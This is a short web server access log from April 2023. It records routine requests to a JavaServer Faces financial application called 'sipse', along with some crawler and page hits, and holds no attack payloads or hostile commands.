200.89.244.60 - - [09/Apr/2023:20:09:24 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:20:09:24 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:20:09:24 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:20:09:24 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:20:09:25 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34202
200.89.244.60 - - [09/Apr/2023:20:09:25 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34202
200.89.244.60 - - [09/Apr/2023:20:09:25 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34202
200.89.244.60 - - [09/Apr/2023:20:09:26 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34202
200.89.244.60 - - [09/Apr/2023:20:09:26 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34202
200.89.244.60 - - [09/Apr/2023:20:09:26 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34202
200.89.244.60 - - [09/Apr/2023:20:09:26 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34202
200.89.244.60 - - [09/Apr/2023:20:09:26 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34202
200.89.244.60 - - [09/Apr/2023:20:09:30 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12899
81.70.9.83 - - [09/Apr/2023:20:09:44 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [09/Apr/2023:20:10:25 -0500] "HEAD / HTTP/1.1" 200 -
200.89.244.60 - - [09/Apr/2023:20:10:35 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 162344
200.89.244.60 - - [09/Apr/2023:20:10:36 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:20:10:36 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:20:10:36 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:20:10:36 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:20:10:37 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:20:10:37 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
200.89.244.60 - - [09/Apr/2023:20:10:37 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
66.249.75.55 - - [09/Apr/2023:20:10:37 -0500] "-" 408 -
200.89.244.60 - - [09/Apr/2023:20:11:06 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 150332
200.89.244.60 - - [09/Apr/2023:20:11:12 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 133110
172.22.2.4 - - [09/Apr/2023:20:10:42 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
34.141.209.26 - - [09/Apr/2023:20:12:34 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
201.245.192.253 - - [09/Apr/2023:20:13:02 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
172.22.2.4 - - [09/Apr/2023:20:11:33 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53914
173.252.95.10 - - [09/Apr/2023:20:13:41 -0500] "GET /images/Rmasar%2018%20de%20febrero%20Grupo.jpg HTTP/1.1" 200 68398
216.245.221.92 - - [09/Apr/2023:20:15:25 -0500] "HEAD / HTTP/1.1" 200 -
